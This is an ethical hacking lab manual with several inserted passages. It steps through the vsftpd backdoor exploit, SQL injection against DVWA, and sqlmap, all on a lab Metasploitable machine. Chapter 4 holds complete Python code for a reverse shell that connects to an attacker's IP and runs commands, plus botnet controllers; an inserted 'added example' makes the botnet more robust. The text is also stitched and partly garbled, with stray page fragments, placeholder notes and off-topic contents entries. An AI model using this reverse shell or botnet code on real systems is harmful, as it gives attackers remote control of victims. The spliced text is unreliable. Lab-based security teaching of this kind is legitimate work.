Daniel Graham

The Ethical Hacking Manual (dgg6b/book/Ethical-Hacking-Manual.pdf)


Contents

List of Figures

1 Getting Setup
1.1 Introduction
1.2 Setting Up Metasploitable
1.3 Starting Kali Linux
1.3.1 Getting the IP address of the metasploitable server
1.4 Your First Hack

2 Armitage: Easily Identify and Exploit Vulnerabilities
2.1 Background
2.2 Vulnerability Scanning Using Armitage
2.3 Exploiting a host using Armitage

3 SQL Injection
3.1 Background
3.2 Your first manual SQL injection attack
3.2.1 Background
3.3 Using SQLMap
3.4 Background

4 Reverse shell & BotNet
4.1 A reverse Shell Client
4.2 Reverse Shell Server
4.3 Running the reverse shell
4.4 Botnet

5 Wireshark Part 1: Networking Crash Course
5.1 Introduction
5.2 Setting up
5.3 Need to make this clearer

6 Wireshark Part 2: Analyzing Malware Traffic
6.1 Introduction
6.2 Importing PCAP files into Wireshark

7 SMTP enumeration & email spoofing
7.1 Email Spoofing

8 ARP Spoofing

9 Open Source Intelligence
9.1 Introduction
9.2 WhoIs
9.3 The Harvester
9.4 Maltego
9.5 List of compromised passwords

10 Creating an Infected File
10.0.1 Capturing image from the camera
10.1 Creating Malicious Files for Windows
10.2 Creating a malicious Android APK
10.3 EggShell iOS payload

11 Communicating Securely

12 Tor and Dark Web
12.1 Background
12.2 Setting up Tor virtual Machine
12.3 Anonymous Browsing

13 Metasploit
13.1 Background
13.2 Using Exploits
13.3 Hide meterpreter process by migrating it
13.4 Exploring the file system
13.5 Key Logging
13.6 Writing a SSL Client
13.7 Challenge

14 Moving through the network

15 Writing Malicious Javascript
15.1 Obfuscating Code
15.2 R Markdown
15.3 Including Plots
15.4 R Markdown


List of Figures

1.1 Networking environment
1.2 Screen shot of virtual box image
1.3 Screen shot of adding a new NAT Network
1.4 Screen shot of configuring metasploitable NAT Network
1.5 Kali Linux Log-in Screen
1.6 Metasploitable Virtual Machine after it has been started
1.7 The output of the netdiscover tool and the IP address of the metasploitable machine
1.8 Terminal containing the IP address of the machine
1.9 Screen shot of metasploitable in the Kali Linux browser
2.1 Armitage Setup Screen
2.2 Armitage Starting Screen
2.3 An example of running the quick scan
2.4 How to execute the vsftpd vulnerability
2.5 The description of the attack
2.6 How to get shell access
3.1 The security level set to low
4.1 How to get shell access
5.1 An annotated screen shot of the Wireshark window
5.2 An annotated screen shot of the Wireshark window
5.3 Filtering Packets on Wireshark
5.4 TCP conversation filtering
5.5 Navigating to Follow TCP Stream on Wireshark
5.6 A screenshot of Follow TCP Stream on Wireshark
8.1 The topology of the virtual lab you configured

# Preface

This book is designed as a step-by-step guide to introduce you to penetration testing. It focuses on breaking into Linux systems, but the tools and techniques discussed in this book can be extended to Windows systems.

## Research Assistants: Onyi Uche: Testing and Figures

## Chapter Contributions: Ahmed Ibrahim: SSL & TLS stripping.

1 Getting Setup

“A journey of a thousand miles begins with a single step.” - Lao Tzu

1.1 Introduction

Welcome to your first step in your hacking journey. In this section we will set up your lab environment. In particular, we will set up two virtual machines:

• Metasploitable Virtual Machine: The machine that you will hack.

• Kali Linux Virtual Machine: The machine that contains the hacking tools discussed in this book.

Since it is illegal to hack machines that you don't own, we need to set up a virtual networking environment that we can hack. The figure below shows an overview of the networking environment: the two virtual machines that you will create connect to a virtual switch, which is then connected to your actual network. Because these machines are behind the virtual switch, outside attackers will not be able to reach the Metasploitable Virtual Machine. This therefore creates an isolated environment for you to hack in.

1.2 Setting Up Metasploitable

In this section we will set up the Metasploitable VM.

FIGURE 1.1: Networking environment

Step 1: Download the Metasploitable2 virtual machine from SourceForge: https://sourceforge.net/projects/metasploitable/ Although there are newer versions of Metasploitable available, we will be using this version because it is easier to set up.

Step 2: Unzip the Metasploitable virtual machine.

Step 3: Download VirtualBox from https://www.virtualbox.org/wiki/Downloads. We will be using VirtualBox because it is free for Linux, Mac OS and Windows machines.

Step 4: Install VirtualBox. (Install the Oracle universal bus)

Step 5: Configure your VirtualBox network settings (adding a new NAT Network). NAT stands for Network Address Translation. Go into your network preferences by clicking on File→Preferences→Network. Click on the little green box to the right to add a new NAT Network and then click OK.

FIGURE 1.2: Screen shot of virtual box image

Step 6: Configure the Metasploitable machine network settings. Right click on the Metasploitable machine in your list of machines on the left →Settings→Network. On Adapter 1, check the 'Enable Network Adapter' box and set 'Attached to' in the drop-down menu to NAT Network. Leave the name as NatNetwork and click OK.

Step 7: Open the Metasploitable virtual machine in the Oracle VM VirtualBox Manager.

1.3 Starting Kali Linux

You will also need to install Kali Linux in a virtual machine. Kali Linux is a Linux distribution that contains a collection of penetration testing tools.

Step 1: You can download the Kali Linux virtual image from https://www.offensive-security.com/kali-linux-vm-vmware-virtualbox-image-download/. You will need to download the version suitable for your system.

FIGURE 1.3: Screen shot of adding a new NAT Network

FIGURE 1.4: Screen shot of configuring metasploitable NAT Network


Step 2: Add the Kali machine to VirtualBox by clicking Machine and then New. Choose a name for the machine, perhaps "Kali", change the type to Linux, and change the version to Other Linux (64-bit). Use the recommended memory size and continue. On the next screen select "use an existing virtual hard disk file", find your VirtualBox download and then click Create.

Step 3: Configure the Kali Linux machine network settings. Right click on the Kali Linux machine in your list of machines on the left →Settings→Network. On Adapter 1, check the 'Enable Network Adapter' box and set 'Attached to' in the drop-down menu to NAT Network. Leave the name as NatNetwork and click OK.

Step 3: Open the Kali Linux virtual machine in the Oracle VM VirtualBox Manager.

Kali Linux black screen problem: make sure the PAE/NX box is checked in Settings -> General -> Processors. If the problem persists, follow the fix tutorial at https://community.linuxmint.com/tutorial/view/

Step 4: Once your machine starts, you should see the Kali Linux login screen below. Log in using the username: root and password: toor

Step 5: Now that your Kali Linux machine is up and running, you will also need to launch your Metasploitable virtual machine so that you can attack it. Select the Metasploitable Virtual Machine from the list in the Oracle VM VirtualBox Manager.

Step 6: Wait for the terminal to finish loading. Your virtual machine should display the Metasploitable logo. (IMPORTANT: Your mouse pointer may disappear; this is because the VM has captured it. Press the Ctrl+Alt keys together to get your mouse back.)

Step 7: Log in using the username: msfadmin and password: msfadmin

FIGURE 1.5: Kali Linux Log-in Screen

FIGURE 1.6: Metasploitable Virtual Machine after it has been started

Great, you have now successfully set up your environment. Let's execute your first hack. Each hack in this manual will start with a goal. For example, the goal for this exercise is:

Goal: Gain access to the Metasploitable server.

1.3.1 Getting the IP address of the metasploitable server

The first step of most hacks is identifying the machine that we want to connect to. Each machine is identified by a unique IP address. In this section we will discover the IP address of the Metasploitable server.

Step 1: Open the terminal on your Kali Linux machine by clicking the icon in the top section of the menu.

Step 2: Type the following command: netdiscover. The netdiscover tool probes multiple IP addresses on your network in an attempt to discover which ones are currently in use. This tool lets you see all the machines that are currently connected to the same Local Area Network (LAN).

Step 3: After a couple of minutes netdiscover should have discovered the Metasploitable server and its IP address. (IMPORTANT: This IP will be different for everyone. You must use the IP address that is output in your terminal, not the one from the picture.) Great, now that you have the IP address you should be able to visit the web pages that the server is hosting.

FIGURE 1.7: The figure above shows the output of the netdiscover tool and the IP address of the metasploitable machine

Step 4: If you are unable to discover the IP address of the Metasploitable virtual machine using the steps above, you can log in to the machine using the username: msfadmin and password: msfadmin.

FIGURE 1.8: The figure above shows the terminal containing the IP address of the machine

Step 5: Once you have logged into the machine, type the following command into the terminal:

ifconfig

You will see the IP address under "inet addr" in the 'eth' (Ethernet) portion of the output. Do not use the 'lo' (local loopback) inet addr. For example, under the 'eth' portion you could have 'inet addr:10.0.2.4...'. In this case, 10.0.2.4 is the IP address that you want. Refer to Figure 1.8.

Step 6: Open the Kali Linux web browser.

Step 7: Type the IP address that you obtained from netdiscover or from Metasploitable's ifconfig output into the URL bar. For example, if the metasploitable_IP_address that was output on my terminal is 10.0.2.4, then in my Kali Linux browser I would put the following: http://10.0.2.4. You should see the page in Figure 1.9:

FIGURE 1.9: Screen shot of metasploitable in the Kali Linux browser

1.4 Your First Hack

The way hackers gain access to machines is through vulnerabilities. You can think of these vulnerabilities as open doors to your system. Hackers leverage these open doors (vulnerabilities) to gain access to systems. The Metasploitable server has an FTP vulnerability (described below). In this section of the lab you will exploit this vulnerability to gain access to the server.

Vulnerability: The vulnerability that we are going to exploit in this lab is a "back door". A back door is an intentional flaw that was added to a system by an attacker that allows the attacker to gain access. In particular we are going to look at a vulnerability that was added by a malicious developer to an open source UNIX FTP server called vsftpd. The back door allowed the attacker to gain access to the terminal on the vulnerable machine. The attack was activated when the attacker logged into the FTP server using a username ending in :) and an invalid password. Once the attack was activated it opened a reverse shell on port 6200.

Reverse Shell: A reverse shell is a malicious program that connects to an attacker's machine, allowing the attacker to execute terminal commands on the compromised machine. In a later lab we will write a reverse shell.

Background: An FTP (File Transfer Protocol) server is a program that allows users to upload and download files from a machine.

Step 1: Connect to the FTP server using telnet. Open the terminal on your Kali Linux machine and type the following command. Remember to add the port number at the end. [Important: telnet is an old technology; there is no backspace.]

```
root@kali: telnet [IP address of your Metasploitable VM] 21
user Hacker:)
331 Please specify the password.
pass invalid
Connection closed.
```

**Background:** This is part of a vulnerability that was placed in the open source FTP server by an unknown hacker. This hacker created the vulnerability by modifying the open source code for the vsftpd server to include a check for :) in the username field; if a user included a :) in the username, the backdoor was activated. So you might be wondering: what is a backdoor? A backdoor is a program that an attacker places on a machine that gives the hacker access to that machine's terminal. In the step above, the attacker is activating the backdoor. In the subsequent steps the attacker connects to the backdoor running on port 6200 and issues commands to the terminal.

Step 2: Now that you have activated the back door you can log in to get access to the terminal (get a shell) by connecting to the "backdoor" that is running on port 6200. Connect to the backdoor using netcat, and use the Linux ls command to list all of the files on the machine.

```
root@Kali: nc [IP address of vulnerable machine] 6200
id
ls
```

Notice that it executes the ls command in the terminal of the compromised machine and returns the directory listing of the machine. Do you notice anything about the contents of the directory?

We have hidden a secret image in the file system on the Metasploitable server. Now that you have access to the server's file system, see if you can find the secret image. Once you have found the secret image, let the Ethical Hacking Lab Community know by tweeting it.

Fix: So how do we fix this vulnerability? Newer versions of the vsftpd FTP server have identified and patched this vulnerability, so the best way to secure this server is to install an updated version of vsftpd:

```
sudo apt-get update && sudo apt-get install --only-upgrade vsftpd
```

(The Metasploitable machine is designed to be vulnerable, so it is not configured to support updates.)

2 Armitage: Easily Identify and Exploit Vulnerabilities

"Technology is nothing. What's important is that you have a faith in people, that they're basically good and smart, and if you give them tools, they'll do wonderful things with them." - Steve Jobs

2.1 Background

Great, so we can use netdiscover to find machines. But how do we know what vulnerabilities exist on these machines? In the previous lab we told you what vulnerabilities existed, but how do you discover and exploit these on your own? This is where Armitage comes in. Armitage is a GUI interface for Metasploit (a tool we will look at in a later lab). Armitage allows you to easily scan hosts for vulnerabilities and exploit these vulnerabilities with only a few clicks.

2.2 Vulnerability Scanning Using Armitage

Goal: Scan the Metasploitable host for vulnerabilities and exploit one of these vulnerabilities to gain access to the machine.

Step 1: Start the Metasploitable server by clicking on the VirtualBox icon. Select the Metasploitable virtual machine and press the play button.

Step 2: Click on the Armitage icon.

Step 3: You should see the setup screen shown below. Click Connect.

FIGURE 2.1: Armitage Setup Screen

Step 4: If you get a pop up asking you to start the Metasploit RPC server, click Yes. (Armitage communicates with Metasploit using the RPC server.) If everything is working well, you should get the following screen.

Step 5: Once you have successfully set up Armitage, you will need to discover the machines that you would like to scan for vulnerabilities. You can do this using the netdiscover tool from lab one, or you can use Armitage's discovery tool. Click on Hosts→Scan→Quick Scan OS Detect.

Step 6: To ensure that we don't attack unintended machines on our network, we will manually add the IP address of our Metasploitable machine to our Armitage workspace.

Step A: You will get a pop up that asks you for the range of IP addresses that you want to scan. This takes IP addresses in CIDR notation, for example 192.168.1.0/24. IP version 4 addresses are 32-bit addresses. This notation means that you should keep the first 24 bits static and vary the remaining 8 bits to search for hosts. Enter the following IP address range in the box: [Your-IP-address]/24. Remember from the first lab that it is possible to get your IP address by running the ifconfig command.

FIGURE 2.2: Armitage Starting Screen

FIGURE 2.3: The figure shows an example of running the quick scan

Step B: Once your scan has completed you will notice that Armitage has discovered the Metasploitable host.

Step 7: You will notice that one of the machines has the same address as the Metasploitable host from the first lab. Right click on this machine and select Scan. Once the scan has completed you will see a list of open ports on the machine.

Step 8: Now that we have discovered some hosts and some open ports, let's scan them for vulnerabilities. Click on the host that you want to scan; it will be highlighted by a green box. Then click on Attacks→Find Attacks.

A Hail Mary attack tries every attack in an attempt to break into the system.

Step 9: Once the vulnerability scan has completed you can see the exploitable vulnerabilities by right clicking on the host and selecting Attacks. The image below shows the FTP attack from our first lab.
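Step A above asks you to turn your own address into a /24 scan range, and Step 5 of lab one had you read that address out of ifconfig by hand while skipping the lo entry. The Python script below is an added example (not code from the manual) that does both from a constructed, old-style ifconfig listing, and adds an in_scope check so that a host reported by netdiscover can be confirmed to lie inside the lab network before it is scanned. The interface names, addresses and helper names are assumptions made for this example.

```python
import ipaddress
import re

# Constructed sample of the old-style ifconfig output that Metasploitable 2 prints.
# The addresses are made up for this example.
SAMPLE_IFCONFIG = """\
eth0      Link encap:Ethernet  HWaddr 08:00:27:12:34:56
          inet addr:10.0.2.4  Bcast:10.0.2.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
"""

# An interface block starts with its name at column 0; the IPv4 line carries
# "inet addr:" and "Mask:" (with "Bcast:" in between on non-loopback interfaces).
_IFACE_RE = re.compile(r"^(\S+)\s+Link encap:")
_ADDR_RE = re.compile(r"inet addr:(\S+).*?Mask:(\S+)")


def parse_ifconfig(text):
    """Return {interface: (ipv4_address, netmask)} for each interface with an IPv4 address."""
    result = {}
    for block in re.split(r"\n(?=\S)", text):  # a new block begins at each non-indented line
        name = _IFACE_RE.match(block)
        addr = _ADDR_RE.search(block)
        if name and addr:
            result[name.group(1)] = (addr.group(1), addr.group(2))
    return result


def primary_address(text):
    """The address Step 5 of lab one tells you to read by hand: the first non-loopback interface."""
    for name, (addr, _mask) in parse_ifconfig(text).items():
        if name != "lo" and not ipaddress.ip_address(addr).is_loopback:
            return addr
    return None


def scan_range(addr, mask):
    """CIDR block for Armitage's scan box: network bits stay fixed, host bits vary (e.g. 10.0.2.0/24)."""
    return str(ipaddress.ip_interface(f"{addr}/{mask}").network)


def usable_host_count(cidr):
    """How many host addresses the scan will vary over (254 for a /24)."""
    return sum(1 for _ in ipaddress.ip_network(cidr).hosts())


def in_scope(candidate, cidr):
    """True only if a discovered host lies inside the lab network, so an unintended machine is never scanned."""
    return ipaddress.ip_address(candidate) in ipaddress.ip_network(cidr)


if __name__ == "__main__":
    addr, mask = parse_ifconfig(SAMPLE_IFCONFIG)["eth0"]
    cidr = scan_range(addr, mask)
    print("Address from ifconfig:", primary_address(SAMPLE_IFCONFIG))
    print("Range to enter in Armitage:", cidr, "-", usable_host_count(cidr), "host addresses")
    for host in ("10.0.2.7", "192.168.1.5"):
        print(host, "in scope" if in_scope(host, cidr) else "OUT OF SCOPE - do not scan")
```

The in_scope check is the programmatic form of Step 6's advice: anything netdiscover or Armitage reports outside your own /24 is not part of the lab and must not be scanned.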

FIGURE 2.4: The figure above shows how to execute the vsftpd vulnerability

2.3 Exploiting a host using Armitage

Step 1: Click on the FTP attack. This will show you a description of the attack.

When Armitage attacks a host it uploads a payload that allows you to control the host. This payload needs to be configured so that it can connect to your machine, so you can control it and in turn control the infected host.

Each parameter in the table shown in the figure above is explained below:

• LHOST: The IP address of the controlling machine.
• LPORT: The port on the controlling machine.
• RHOST: The IP address of the host being attacked.
• RPORT: The port used by the payload.

FIGURE 2.5: The figure above shows the description of the attack

In a reverse connection the attacked host will start the connection.

Step 2: Click Launch to launch the attack. Once your host is compromised the host icon will change.

Step 3: You can now get shell access on the machine by right clicking on the host and selecting shell 1→Interact. A Linux shell will appear in the bottom section of Armitage.

FIGURE 2.6: The figure above shows how to get shell access.

Step 4: You should see a terminal open up at the bottom of the window. Type the ls command in this window.

Step 5: We have hidden a file on the Metasploitable server called level002.txt. See if you can read the contents of the file. If you are able to find it, post the contents to our Facebook wall.

Fix: Patch, patch, patch. The way to prevent attacks like the one above is to ensure that your software is always up to date, so that the system does not contain any known vulnerabilities.

3 SQL Injection

"For the want of a nail the shoe was lost, For the want of a shoe the horse was lost, For the want of a horse the rider was lost, For the want of a rider the battle was lost, For the want of a battle the kingdom was lost, And all for the want of a horseshoe-nail." - Benjamin Franklin

3.1 Background

In the previous lab we looked at the vsftpd FTP backdoor vulnerability that was maliciously injected into an open source implementation of an FTP server by hackers. What if the operating system and services on a machine don't have any vulnerabilities? Then how do you get access to the machine? The answer: through the web apps.

In this lab we will look at SQL injection, which is a vulnerability that occurs when software developers incorrectly process parameters that are used in SQL queries. SQL is a language that is used to query tables in a database. For example, the following query returns the first and last name for the user whose Social Security Number is 555-5555-5555.

```sql
SELECT firstname, lastname from Users where SSN = '555-5555-5555';
```

To allow for more generic queries a programmer might replace the hard-coded SSN value of 555-5555-5555 with a variable $id.

```sql
SELECT firstname, lastname from Users where SSN = '$id';
```

This would allow the program to return the first name and last name for any value of $id.

Vulnerability: Since the program is simply inserting the parameter string into the SQL query, a hacker can edit the query by injecting her own. For example, if the hacker sets the value of $id to

```
' UNION SELECT username, password from users where '' = '
```

injecting this value for id will result in the following query:

```sql
SELECT firstname, lastname from Users where SSN = '' UNION SELECT username, password from users where '' = '';
```

The query SELECT firstname, lastname from Users where SSN = '' will not return anything since there are no entries in the table with blank SSNs. This result will then be unioned with the result of the second query, which returns the username and password for all entries in the users table, since every entry matches the condition '' = ''.
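To see exactly why the injected value works, and what the fix looks like, here is an added Python example (not code from the manual or from DVWA) that runs the query from the text against an in-memory SQLite database: lookup_vulnerable pastes $id into the query string the way the text describes, while lookup_safe binds it as a query parameter instead. The table layout and rows are constructed for the example; for simplicity a single table named users carries both the name/SSN columns and the username/password columns that the text reads from "Users" and "users".

```python
import sqlite3

# Constructed sample rows, not DVWA's real data.
SAMPLE_USERS = [
    ("Alice", "Smith", "555-5555-5555", "alice", "example-pass-1"),
    ("Bob", "Jones", "555-5555-5556", "bob", "example-pass-2"),
]

# The injected value from the text: the leading quote closes the SSN string,
# the UNION reads two other columns, and the trailing '' = ' is completed by the
# query's own closing quote into a condition that is always true.
PAYLOAD = "' UNION SELECT username, password from users where '' = '"


def make_db():
    """In-memory database loaded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (firstname TEXT, lastname TEXT, SSN TEXT, username TEXT, password TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, ssn):
    """The pattern the text describes: $id is spliced straight into the SQL string."""
    query = f"SELECT firstname, lastname from users where SSN = '{ssn}'"
    return conn.execute(query).fetchall()


def lookup_safe(conn, ssn):
    """Parameterised query: the value travels separately from the SQL text, so the
    quotes and the UNION inside it are compared as a literal SSN, never parsed as SQL."""
    return conn.execute(
        "SELECT firstname, lastname from users where SSN = ?", (ssn,)
    ).fetchall()


if __name__ == "__main__":
    conn = make_db()
    print("normal lookup:   ", lookup_vulnerable(conn, "555-5555-5555"))
    print("injected, vuln:  ", lookup_vulnerable(conn, PAYLOAD))  # every username/password pair
    print("injected, safe:  ", lookup_safe(conn, PAYLOAD))        # [] - no SSN equals the payload
```

The vulnerable query succeeds only because the injected UNION selects the same number of columns (two) as the original SELECT; the parameterised version removes the problem entirely rather than trying to filter the input.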

3.2 Your first manual SQL injection attack

Goal: Use SQL injection to obtain the username and password for users of DVWA (Damn Vulnerable Web App) running on the Metasploitable server.

3.2.1 Background

The Damn Vulnerable Web App (DVWA) is a web application that was built to showcase common web vulnerabilities. Before we can exploit the vulnerability we need to place the web app in a vulnerable state. DVWA is running on the Metasploitable machine, so we need to connect to the machine and place the app in the vulnerable state before we begin the SQL injection attack.

Step 1: Start up your Metasploitable virtual machine and get its IP address using the ifconfig command. Type this IP address into the browser.

Step 2: Log in to DVWA using username: admin and password: password.

Step 3: Click on the DVWA Security tab.

Step 4: Set the security level to low.

FIGURE 3.1: The figure above shows the security level set to low

Step 5: Click on the SQL Injection tab.

Step 6: Execute a sample SQL injection attack.

Page 34: The Ethical Hacking Manualdgg6b/book/Ethical-Hacking-Manual.pdf1.3 Starting Kali Linux 11 FIGURE 1.2: Screenshotofvirtualboximage Step 6: Configure the metasploitable machine network

32 3 SQL Injection

3.3 Using SQLMap

3.4 Background.Now that we have place DVWA in a vunerable state. We can nowuse a project called SQL map to perform SQL injection on the webapp. This is a tool that is commonly used by attackers.

Step 1: Navigate to the SQL injection section tab in DVWA Linux

GOAL: We want to capture the URL that is associated with the SQLinjection.

Step 2: Open the Developer Console by pressing Ctrl-Shift-I and click on the Network tab. (This lets us capture the request. We could also use an intercepting proxy for this.)

Step 3: Enter the value 1 in the User ID box and click Submit, so that a sample request is sent.

Step 4: Select the GET request associated with the submission and copy its URL.

Step 5: You will also need the cookies that were sent with the request. The cookie can be found in the GET request, under the Cookies tab, or by typing "document.cookie" into the web console. (The security=low cookie is what keeps DVWA in the vulnerable state, so sqlmap must send it too.)

Step 6: To start sqlmap go to Applications → Database Assessment → sqlmap.

Step 7: Start sqlmap.

Step 8: Point sqlmap at the URL you captured earlier and pass it the cookie from the same capture (the -u and --cookie options).



Answer yes to the prompts sqlmap shows. From our earlier test we know that the id parameter is vulnerable, so we will stop our search there. Take a look at some of the payloads sqlmap tried: pretty creative, right?


4 Reverse shell & BotNet

##Introduction: In this lab we will learn the basics of socket programming by implementing a reverse shell. We then show how this reverse shell can be extended to implement a simple botnet.

###Sockets and process communication A socket is a software abstraction that allows programs to communicate over the network. Two types of sockets are commonly used: 1) TCP sockets and 2) UDP sockets. TCP sockets ensure that all the data sent is reliably delivered, in order, over the network; they are commonly used for file transfer and similar applications. UDP sockets trade reliability for speed; common applications that use UDP are audio and video streaming. In this lab we will use TCP sockets.

FIGURE 4.1: The figure above shows how to get shell access.

###Reverse Shell A reverse shell is a program that is comprised of two parts:

- A communication component that connects to the attacker's computer. This is where the "reverse" part of the name comes from: the program on the victim connects out to the attacker's computer, rather than the attacker connecting in (which a firewall would usually block).
- A shell component that lets the attacker execute shell commands on the victim's machine and read the results of those commands.

##Setting Up Your Python Environment: We will be developing our reverse shell in Python, so you will need to set up a Python development environment.

Step 1 Open the

Step 2 Save the blank file by clicking File → Save As client.py (save the file to your Desktop; this will make it easier to find later in the lab).

4.1 A reverse Shell Client. Step 3 The code below creates a simple TCP socket that connects back to the attacker's machine, then runs each command it receives and sends the output back.

```python
import subprocess
import sys
from socket import *

serverName = sys.argv[1]          # attacker's IP address, given on the command line
serverPort = 8000
clientSocket = socket(AF_INET, SOCK_STREAM)
clientSocket.connect((serverName, serverPort))   # "reverse": the victim connects out
clientSocket.send('Bot reporting for duty'.encode())
command = clientSocket.recv(4064).decode()

while command != "exit":
    try:
        # run the command and capture its output (stderr too, so errors are visible)
        result = subprocess.run(command.split(" "), stdout=subprocess.PIPE,
                                stderr=subprocess.STDOUT)
        message = result.stdout
    except OSError as error:       # e.g. the command does not exist on this machine
        message = str(error).encode()
    # always send something back, otherwise the server's recv() blocks forever
    clientSocket.send(message or b'(no output)')
    command = clientSocket.recv(4064).decode()

clientSocket.close()
```

**Step 4** Create a folder called "botnet" on your Kali Desktop. Save the file above as "clientBot.py".

4.2 Reverse Shell Server. Step 5 Now we will write the server that runs on the attacker's box. It waits for the bot to connect, then reads commands from the keyboard, sends them to the bot and prints whatever comes back.

```python
from socket import *

serverPort = 8000
serverSocket = socket(AF_INET, SOCK_STREAM)
serverSocket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)   # allow quick restarts of the server
serverSocket.bind(('', serverPort))
serverSocket.listen(1)
print("Attacker box listening and awaiting instructions")
connectionSocket, addr = serverSocket.accept()
print("Thanks for connecting to me, bot " + str(addr))
message = connectionSocket.recv(1024)
print(message.decode())

command = ""
while command != "exit":
    command = input("Please enter a command: ")
    connectionSocket.send(command.encode())
    if command == "exit":
        break                      # the bot closes without replying, so don't wait for one
    message = connectionSocket.recv(1024)
    print(message.decode())

connectionSocket.close()
serverSocket.close()
```

Step 6 Save the file as "serverBot.py" in the "botnet" folder you created earlier on the Desktop.



4.3 Running the reverse shell. We have placed a copy of the botnet client on the Metasploitable virtual machine. Normally an attacker would use a known vulnerability to get access to a machine and plant the client, as we saw during the Armitage lab. (The client uses subprocess.run, which needs Python 3.5 or newer; check the Python version on the target before running it.)

Step 7 Start the botnet server by opening the terminal and navigating to the botnet folder on the Kali Desktop. Run the file by typing python serverBot.py

[Include screen shot below]

Now the server bot is running and waiting for clients to connect to it. So let's activate the botnet client.

Step 8 Log into the Metasploitable machine using username: msfadmin, password: msfadmin.

Step 9 cd into the folder called botnet and run the botnet client by typing: python clientBot.py [IP address of your Kali box]. (Remember that you can get the IP address of the Kali Linux box with the ifconfig command.)

[Include a picture and place botnet client on Armitage machine]

Step 10 Your client bot should now be connected to your server bot. Try executing a whoami command.

[Include a picture]

4.4 Botnet. The example above discusses a single client/server pair. How would we extend it so that a single machine could control several clients at once? This is exactly what happens in a botnet: several client machines (bots) connect to a single machine called the botnet master, which then sends its commands to all of the bots that have connected to it. The code below shows how we would extend the server to handle multiple client bots: it first collects the connections, then sends each command to every bot in turn.

```python
from socket import *

serverPort = 8000
serverSocket = socket(AF_INET, SOCK_STREAM)
serverSocket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
serverSocket.bind(('', serverPort))
serverSocket.listen(10)            # ten bots max waiting in the accept queue
print("Attacker box listening and awaiting instructions")

bots = []
numberOfBots = int(input("How many bots should connect? "))
while len(bots) < numberOfBots:
    connectionSocket, addr = serverSocket.accept()
    print("Thanks for connecting to me, bot " + str(addr))
    print(connectionSocket.recv(1024).decode())   # "Bot reporting for duty"
    bots.append(connectionSocket)

command = ""
while command != "exit":
    command = input("Please enter a command: ")
    for connectionSocket in bots:                 # same command to every bot
        connectionSocket.send(command.encode())
        if command != "exit":
            print(connectionSocket.recv(1024).decode())

for connectionSocket in bots:
    connectionSocket.close()
serverSocket.close()
```
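An added example (not the manual's code) of the multi-bot controller described above, written so it can be exercised without a network. It fixes two weaknesses a practitioner hits immediately with the recv(1024) loop: every message carries a 4-byte length prefix, so output longer than one recv() buffer is reassembled instead of cut short, and the bot runs commands through the shell and returns stderr as well as stdout. broadcast() fans one command out to all bots in parallel. start_local_bots() and port 8000 are assumptions for the demo; in the lab the bots would connect over TCP exactly as clientBot.py does.

```python
import socket
import struct
import subprocess
import threading

# Each message on the wire is a 4-byte big-endian length followed by the payload,
# so a reply longer than one recv() buffer is reassembled instead of cut short.
HEADER = struct.Struct("!I")


def send_msg(sock, payload):
    sock.sendall(HEADER.pack(len(payload)) + payload)


def recv_exact(sock, n):
    buf = bytearray()
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed the connection")
        buf += chunk
    return bytes(buf)


def recv_msg(sock):
    (length,) = HEADER.unpack(recv_exact(sock, HEADER.size))
    return recv_exact(sock, length)


def bot_loop(sock):
    """Bot side: run each command through the shell, send back stdout and stderr."""
    try:
        while True:
            command = recv_msg(sock).decode()
            if command == "exit":
                break
            result = subprocess.run(command, shell=True, capture_output=True)
            send_msg(sock, result.stdout + result.stderr)
    finally:
        sock.close()


def broadcast(bots, command):
    """Controller side: send one command to every bot in parallel and return
    {bot_index: output_bytes}. 'exit' is sent without waiting for a reply."""
    replies = {}

    def talk(index, sock):
        try:
            send_msg(sock, command.encode())
            if command != "exit":
                replies[index] = recv_msg(sock)
        except OSError as exc:
            replies[index] = f"<bot {index} error: {exc}>".encode()

    threads = [threading.Thread(target=talk, args=(i, s)) for i, s in enumerate(bots)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return replies


def start_local_bots(count):
    """Demo helper (an assumption, not part of the lab): run `count` bots in threads
    over socketpairs and return the controller-side sockets. No network involved."""
    controller_ends = []
    for _ in range(count):
        controller_end, bot_end = socket.socketpair()
        threading.Thread(target=bot_loop, args=(bot_end,), daemon=True).start()
        controller_ends.append(controller_end)
    return controller_ends


def serve(port=8000, expected=2):
    """Network version: accept `expected` bots, then fan out commands typed at the prompt."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind(("", port))
    listener.listen(expected)
    bots = []
    while len(bots) < expected:
        conn, addr = listener.accept()
        print("bot connected from", addr)
        bots.append(conn)
    command = ""
    while command != "exit":
        command = input("command> ")
        for index, output in sorted(broadcast(bots, command).items()):
            print(f"--- bot {index} ---\n{output.decode(errors='replace')}")
    listener.close()


if __name__ == "__main__":
    serve()
```

The framing is the important part: the recv(1024) version in the lab silently truncates a long directory listing and leaves the rest of it to be read as the reply to the next command, which is a classic source of confusing botnet bugs.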


5 Wireshark Part 1: Networking Crash Course

5.1 Introduction. Computers communicate over the network using packets. This means that if we can intercept or spoof these packets we can learn a lot about a user and their network traffic.

In this lab you will be introduced to Wireshark. Wireshark is a networking tool that lets you capture all of the outgoing and incoming packets on your machine.

5.2 Setting up. Step 1 Open Wireshark by clicking the shark-fin icon on the Kali Linux toolbar.

FIGURE 5.1: An annotated screen shot of the wireshark window

Step 2 Click the eth0 interface to start the capture.

Step 3 Press the shark-fin icon (in the top left) to start the processof capturing packets.

Step 4 There are three main panes in Wireshark. The figure below shows an annotated screenshot of the three panes.




FIGURE 5.2: An annotated screen shot of the wireshark window

##Analyzing Network Traffic Step 5 Wireshark lets you capture packets from your own machine. This makes it a great tool for digital forensics: capture the traffic from an infected machine and analyze what is currently happening on it.

Step 6 Open the firefox app and visit http://www.cs.virginia.edu.

Step 7 Click the red stop icon to stop the packet capture.

